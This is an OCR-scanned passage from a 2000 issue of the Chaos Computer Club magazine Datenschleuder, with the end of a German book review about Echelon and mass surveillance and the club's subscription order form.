wird das globale Überwachungssystem Eche- 
lon, seine Entwicklung und seine Fähigkeiten 
vorgestellt. Daneben werden die westdeutsche 
Funkspionage und die US-Pläne zur Abwehr 
von "Cyberattakken" untersucht. 

Der dritte Abschnitt trägt die Überschrift 
"Zukunftslabor" und fällt schon rein optisch 
aus dem Rahmen. Er enthält eine Sammlung 
von Beiträgen, die bereits in der Telepolis veröf- 
fentlicht wurden. Was in den Beiträgen teil- 
weise wie Science-Fiction anmutet, sind 
aktuelle Forschungsprojekte oder bereits im 
Einsatz befindliche Systeme zur " intelligenten " , 
automatisierten Überwachung. 

Häufig werden Überwachungsmaßnahmen in 
Kauf genommen, wenn durch sie eine Senkung 
der subjektiven Gefährdung durch Straftaten 
suggeriert wird. Der vierte Abschnitt handelt 
von diesem Phänomen. Anhand des Beispiels 
England wird deutlich gemacht, wie die Über- 
wachung zur Abwehr einer Gefahr (z.B. Bom- 
benanschläge der IRA) vorangetrieben und 
gerechtfertigt wird. Obwohl die Überwachung 
durch die technische Entwicklung immer tiefer- 
greifend und lückenloser wird, scheint ein 
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Großteil der Bevölkerung dies nicht wahrzu- 
nehmen oder sich damit bereits abgefunden zu 
haben. Detlef Nogala vergleicht dies in seinem 
Beitrag mit einem "Frosch im heißen Wasser". 

Der letzte Abschnitt des Buches untersteht der 
Frage, ob Aufklärung möglich ist. Damit ist 
gemeint, wie sich beispielsweise Informationen 
aus einer Buchveröffentlichung über Echelon 
aus dem Jahre 1996 zunächst überhaupt nicht 
verbreitet haben, sobald die erste Aufmerksam- 
keitswelle abgeebbt war. Das Buch schließt mit 
der Beschreibung der Tätigkeiten internationa- 
ler und deutscher Bürgerrechtsgruppen, die sich 
gegen eine Ausweitung der Überwachung 
wehren. 

Werdetaillierte Einzelheiten über die Enfopol- 
Papiere oder Echelon erwartet, wird sie in die- 



sem Buch nicht finden. Was in diesem Buch 
zusammengetragen wurde, sind Beispiele für 
eine tiefgreifende Entwicklung, die viele noch 
gar nicht wahrgenommen haben. Es wird deut- 
lich, wie notwendig eine breite öffentliche Dis- 
kussion ist. Mit diesem Buch werden dem Leser 
die notwendigen Hintergrundinformationen 
gegeben. Insbesondere für Einsteiger in diesen 
Themenkomplex ist es daher geeignet. Viele 
Beiträge sind durch Literaturlisten komplettiert, 
die dazu anregen, sich weitergehend zu infor- 
mieren. Insgesamt ist das Buch sehr empfeh- 
lenswert. <sebastian> 

Christiane Schulzki-Haddouti, Vom Ende der Anony- 
mität : Die Globalisierung der Überwachung, Verlag 
Heise Verlag (Telepolis), Hannover, ISBN: 3-88229- 
185-0 DM 29- 



#073 / Winter 2000 



dip datpnschLpurJpr. 



BESTELLFETZEN 



Bestellungen, Mitgliedsanträge und Adressänderungen bitte senden an: 

CCCe.V., Lokstedter Weg 72, D-20251 Hamburg 
Adressänderungen und Rückfragen auch per E-Mail an: office@ccc.de 

- Satzung + Mitgliedsantrag 
DM 5,00 

- Datenschleuder-Abonnement, 8 Ausgaben 
Normalpreis DM 60,00 für 
Ermässigter Preis DM 30,00 

Gewerblicher Preis DM 100,00 (Wir schicken eine Rechnung) 

- Alte Ausgaben der Datenschleuder auf Anfrage 

- Chaos CD blue, alles zwischen 1982 und 1999 
DM 45,00 + DM 5,00 Portopauschale 

Die Kohle 

- liegt als Verrechnungsscheck bei 

- wurde überwiesen am . . an 

Chaos Computer Club e.V., Konto 59 90 90-201 
Postbank Hamburg, BLZ 200 100 20 

Name: 

Strasse: 
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Tel., Fax: 
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